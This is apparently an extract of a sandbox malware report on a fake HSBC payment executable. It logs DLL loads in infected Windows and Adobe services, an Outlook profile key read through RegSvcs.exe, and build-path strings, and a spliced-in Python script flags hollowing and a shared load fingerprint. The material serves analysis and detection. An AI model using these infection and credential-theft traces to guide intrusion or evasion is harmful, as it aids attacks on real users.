Source: C:\Windows\System32\msdtc.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: hid.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: devobj.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: mpr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: secur32.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\perfhost.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\perfhost.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\perfhost.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\perfhost.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\perfhost.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\perfhost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\perfhost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\SensorDataService.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\SensorDataService.exe Section loaded: mfplat.dll
Source: C:\Windows\System32\SensorDataService.exe Section loaded: rtworkq.dll
Source: C:\Windows\System32\SensorDataService.exe Section loaded: windows.devices.perception.dll
Source: C:\Windows\System32\SensorDataService.exe Section loaded: mediafoundation.defaultperceptionprovider.dll
Source: C:\Windows\System32\SensorDataService.exe Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\System32\SensorDataService.exe Section loaded: propsys.dll
Source: C:\Windows\System32\SensorDataService.exe Section loaded: structuredquery.dll
Source: C:\Windows\System32\SensorDataService.exe Section loaded: profapi.dll
Source: C:\Windows\System32\SensorDataService.exe Section loaded: windows.globalization.dll
Source: C:\Windows\System32\SensorDataService.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\SensorDataService.exe Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\SensorDataService.exe Section loaded: icu.dll
Source: C:\Windows\System32\SensorDataService.exe Section loaded: mswb7.dll
Source: C:\Windows\System32\SensorDataService.exe Section loaded: devdispitemprovider.dll
Source: C:\Windows\System32\snmptrap.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\snmptrap.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\snmptrap.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\snmptrap.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\snmptrap.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\snmptrap.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\snmptrap.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\snmptrap.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: spectrumsyncclient.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: mpr.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: secur32.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: perceptionsimulationextensions.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: hid.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: holographicruntimes.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: perceptiondevice.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: spatialstore.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: esent.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: analogcommonproxystub.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: propsys.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: structuredquery.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: profapi.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: windows.globalization.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: icu.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: mswb7.dll
Source: C:\Windows\System32\Spectrum.exe Section loaded: devdispitemprovider.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe Section loaded: libcrypto.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe Section loaded: mpr.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe Section loaded: secur32.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\TieringEngineService.exe Section loaded: esent.dll
Source: C:\Windows\System32\TieringEngineService.exe Section loaded: clusapi.dll
Source: C:\Windows\System32\TieringEngineService.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\TieringEngineService.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\TieringEngineService.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AgentService.exe Section loaded: fltlib.dll
Source: C:\Windows\System32\AgentService.exe Section loaded: version.dll
Source: C:\Windows\System32\AgentService.exe Section loaded: activeds.dll
Source: C:\Windows\System32\AgentService.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\AgentService.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\AgentService.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AgentService.exe Section loaded: appmanagementconfiguration.dll
Source: C:\Windows\System32\vds.exe Section loaded: atl.dll
Source: C:\Windows\System32\vds.exe Section loaded: osuninst.dll
Source: C:\Windows\System32\vds.exe Section loaded: vdsutil.dll
Source: C:\Windows\System32\vds.exe Section loaded: bcd.dll
Source: C:\Windows\System32\vds.exe Section loaded: uexfat.dll
Source: C:\Windows\System32\vds.exe Section loaded: ulib.dll
Source: C:\Windows\System32\vds.exe Section loaded: ifsutil.dll
Source: C:\Windows\System32\vds.exe Section loaded: devobj.dll
Source: C:\Windows\System32\vds.exe Section loaded: uudf.dll
Source: C:\Windows\System32\vds.exe Section loaded: untfs.dll
Source: C:\Windows\System32\vds.exe Section loaded: ufat.dll
Source: C:\Windows\System32\vds.exe Section loaded: fmifs.dll
Source: C:\Windows\System32\vds.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbengine.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\wbengine.exe Section loaded: virtdisk.dll
Source: C:\Windows\System32\wbengine.exe Section loaded: bcd.dll
Source: C:\Windows\System32\wbengine.exe Section loaded: spp.dll
Source: C:\Windows\System32\wbengine.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\wbengine.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\wbengine.exe Section loaded: clusapi.dll
Source: C:\Windows\System32\wbengine.exe Section loaded: wer.dll
Source: C:\Windows\System32\wbengine.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\wbengine.exe Section loaded: fltlib.dll
Source: C:\Windows\System32\wbengine.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wbengine.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbengine.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbengine.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbengine.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbengine.exe Section loaded: fveapi.dll
Source: C:\Windows\System32\wbengine.exe Section loaded: cscapi.dll
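Two things in the process and module entries above are worth checking mechanically rather than by eye. First, the sample starts RegSvcs.exe (a .NET framework utility) with the sample's own path as the command line, which is the shape a loader produces when it hollows a trusted host and points it at its own image. Second, the third-party and optional services that run after infection (armsvc.exe, elevation_service.exe, maintenanceservice.exe, PerceptionSimulationService.exe, perfhost.exe, Spectrum.exe, ssh-agent.exe) all load the same contiguous run winhttp, mpr, secur32, sspicli, dnsapi, iphlpapi, ntmarta, while msdtc.exe, vds.exe, wbengine.exe and the other system services do not. The Python below is an added example and not part of the Joe Sandbox report: it parses behaviour lines in the page's extracted layout (cell text fused as "exeSection loaded:", "Jump to behavior" link residue kept), rebuilt here from a constructed excerpt of the entries above, and applies both checks. The regexes, function names and the seven-DLL fingerprint are the example's own, not anything the report defines.

```python
import ntpath
import re
from collections import defaultdict

# Constructed excerpt of the report's entries, rebuilt in the exact form the
# page extracts them to so the parser is exercised on the real layout.
SAMPLE = r"C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
ARMSVC = r"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
EDGE_ELEV = r"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
MSDTC = r"C:\Windows\System32\msdtc.exe"
WBENGINE = r"C:\Windows\System32\wbengine.exe"

LOADS = {  # per-process load order, abridged from the entries above
    SAMPLE: ["mpr.dll", "wininet.dll", "iphlpapi.dll", "winhttp.dll",
             "secur32.dll", "sspicli.dll", "dnsapi.dll", "ntmarta.dll"],
    ARMSVC: ["winhttp.dll", "mpr.dll", "secur32.dll", "sspicli.dll",
             "dnsapi.dll", "iphlpapi.dll", "ntmarta.dll", "kernel.appcore.dll"],
    EDGE_ELEV: ["dbghelp.dll", "winhttp.dll", "mpr.dll", "secur32.dll",
                "sspicli.dll", "dnsapi.dll", "iphlpapi.dll", "ntmarta.dll"],
    MSDTC: ["msdtctm.dll", "winmm.dll", "mswsock.dll", "dnsapi.dll",
            "iphlpapi.dll", "sspicli.dll", "ntmarta.dll"],
}
REPORT = "\n".join(
    [f'Source: {SAMPLE}Process created: {REGSVCS} "{SAMPLE}"Jump to behavior',
     f"Source: unknownProcess created: {MSDTC} {MSDTC}",
     f'Source: unknownProcess created: {WBENGINE} "{WBENGINE}"']
    + [f"Source: {p}Section loaded: {d}Jump to behavior"
       for p, dlls in LOADS.items() for d in dlls])

# The event keyword is the only reliable cell boundary in the extracted text,
# so the source column is matched non-greedily up to it.
PROC_RE = re.compile(r"^Source:\s*(?P<src>.*?)\s*Process created:\s*"
                     r"(?P<img>.*?\.exe)\s+(?P<cmd>.*?)(?:Jump to behavior)?$", re.I)
LOAD_RE = re.compile(r"^Source:\s*(?P<src>.*?)\s*Section loaded:\s*"
                     r"(?P<dll>\S+?\.dll)(?:Jump to behavior)?\s*$", re.I)

# Contiguous load run shared by the post-infection service processes above
# (this example's own fingerprint, derived from the report's module list).
STUB_RUN = ["winhttp.dll", "mpr.dll", "secur32.dll", "sspicli.dll",
            "dnsapi.dll", "iphlpapi.dll", "ntmarta.dll"]


def parse_events(text):
    """Turn report lines into process-creation and section-load events."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if m := PROC_RE.match(line):
            events.append({"kind": "process", "source": m["src"],
                           "image": m["img"], "cmdline": m["cmd"]})
        elif m := LOAD_RE.match(line):
            events.append({"kind": "load", "source": m["src"], "dll": m["dll"]})
    return events


def argv0(cmdline):
    """First token of a Windows command line, honouring double quotes."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline[1:cmdline.index('"', 1)]
    return cmdline.split()[0] if cmdline else ""


def find_hollowing_candidates(events):
    """(parent, image, claimed) for every process whose command line names a
    different executable than the one that was actually started."""
    hits = []
    for ev in events:
        if ev["kind"] != "process":
            continue
        started = ntpath.basename(ev["image"]).lower()
        claimed = ntpath.basename(argv0(ev["cmdline"])).lower()
        if claimed and claimed != started:
            hits.append((ev["source"], ev["image"], claimed))
    return hits


def load_order(events):
    """Lower-cased DLL names in load order, keyed by process basename."""
    order = defaultdict(list)
    for ev in events:
        if ev["kind"] == "load":
            order[ntpath.basename(ev["source"]).lower()].append(ev["dll"].lower())
    return order


def processes_with_run(events, run):
    """Processes that load `run` as one contiguous sequence."""
    run = [d.lower() for d in run]
    n = len(run)
    return sorted(proc for proc, dlls in load_order(events).items()
                  if any(dlls[i:i + n] == run for i in range(len(dlls) - n + 1)))


def processes_loading_all(events, dlls):
    """Looser pivot: processes whose load set merely contains all of `dlls`."""
    want = {d.lower() for d in dlls}
    return sorted(p for p, seq in load_order(events).items() if want <= set(seq))


EVENTS = parse_events(REPORT)

if __name__ == "__main__":
    for source, image, claimed in find_hollowing_candidates(EVENTS):
        print(f"hollowing candidate: {source} -> {image} run as {claimed}")
    print("contiguous stub run:", processes_with_run(EVENTS, STUB_RUN))
    print("superset only:", processes_loading_all(EVENTS, STUB_RUN))
```

On the excerpt, the contiguous-run check returns only armsvc.exe and elevation_service.exe, while the looser superset check also returns the sample itself, which loads the same seven DLLs in a different order with wininet.dll in between. The ordered run is the better pivot for finding which legitimate binaries now carry the infector's stub; neither check is a standalone detection, since a clean host of the same services needs to be baselined first, and msdtc.exe shows how much of the set (dnsapi, iphlpapi, sspicli, ntmarta) an uninfected service loads anyway.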
Source: C:\Windows\System32\msdtc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Static file information: File size 1539072 > 1048576
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000004.00000003.1923223807.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1312938919.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000004.00000003.1979488367.0000000000930000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.2001927405.0000000000700000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1983124176.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdb source: armsvc.exe, 00000004.00000003.1396239663.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000004.00000003.1613322674.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ssh-agent.pdb source: armsvc.exe, 00000004.00000003.1495681450.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000004.00000003.1730926356.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000004.00000003.1730926356.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdbGCTL source: armsvc.exe, 00000004.00000003.1396239663.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000004.00000003.1747463030.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000004.00000003.2045470839.00000000009D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.2048639803.00000000009B0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdb source: armsvc.exe, 00000004.00000003.1358380690.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdb source: armsvc.exe, 00000004.00000003.1417715785.00000000020D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1332580741.0000000004890000.00000004.00001000.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1327392894.00000000046F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000004.00000003.1652725988.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdbGCTL source: armsvc.exe, 00000004.00000003.1442209675.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000004.00000003.1917141745.0000000000700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdb source: armsvc.exe, 00000004.00000003.1442209675.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000004.00000003.2033255975.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000004.00000003.1930594845.0000000000930000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1938936279.0000000000700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000004.00000003.1547399003.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000004.00000003.1790951531.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000004.00000003.1621983603.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdb source: armsvc.exe, 00000004.00000003.1434957470.0000000001F70000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1428827763.0000000002000000.00000004.00001000.00020000.00000000.sdmp, Locator.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AdobeCollabSync.pdb# source: AdobeCollabSync.exe.4.dr
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: armsvc.exe, 00000004.00000003.1348039233.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000004.00000003.1747463030.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: vds.pdb source: vds.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000004.00000003.1634257256.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb00 source: unpack200.exe.4.dr
              Source: Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000004.00000003.1621983603.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000004.00000003.1979488367.0000000000930000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.2001927405.0000000000700000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1983124176.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000004.00000003.1652725988.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000004.00000003.1821282243.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000004.00000003.1613322674.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdb source: armsvc.exe, 00000004.00000003.2045470839.00000000009D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.2048639803.00000000009B0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb source: armsvc.exe, 00000004.00000003.1384712298.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, maintenanceservice.exe.4.dr
              Source: Binary string: msdtcexe.pdbGCTL source: armsvc.exe, 00000004.00000003.1388415236.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000004.00000003.1461927383.0000000002050000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdbGCTL source: armsvc.exe, 00000004.00000003.1417715785.00000000020D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000004.00000003.1904523018.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerfHost.pdbGCTL source: armsvc.exe, 00000004.00000003.1423264102.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1427509950.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1422433312.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000004.00000003.2033255975.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000004.00000003.1875324532.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000004.00000003.1790951531.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerfHost.pdb source: armsvc.exe, 00000004.00000003.1423264102.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1427509950.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1422433312.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000004.00000003.1881243622.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000004.00000003.1821282243.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000004.00000003.1923223807.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000004.00000003.1917141745.0000000000700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000004.00000003.1384712298.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, maintenanceservice.exe.4.dr
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000004.00000003.1930594845.0000000000930000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1938936279.0000000000700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1332580741.0000000004890000.00000004.00001000.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1327392894.00000000046F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000004.00000003.1547399003.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdb source: armsvc.exe, 00000004.00000003.1502999442.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000004.00000003.1502999442.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000004.00000003.1828436322.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ALG.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1316924828.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msdtcexe.pdb source: armsvc.exe, 00000004.00000003.1388415236.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: armsvc.exe, 00000004.00000003.1348039233.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ALG.pdbGCTL source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1316924828.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 00000004.00000003.1358380690.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdbGCTL source: armsvc.exe, 00000004.00000003.1434957470.0000000001F70000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1428827763.0000000002000000.00000004.00001000.00020000.00000000.sdmp, Locator.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000004.00000003.1634257256.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: vds.pdbGCTL source: vds.exe.4.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb source: unpack200.exe.4.dr
              Source: Binary string: ssh-agent.pdbX source: armsvc.exe, 00000004.00000003.1495681450.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdb source: armsvc.exe, 00000004.00000003.2027358358.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, AppVShNotify.exe.4.dr
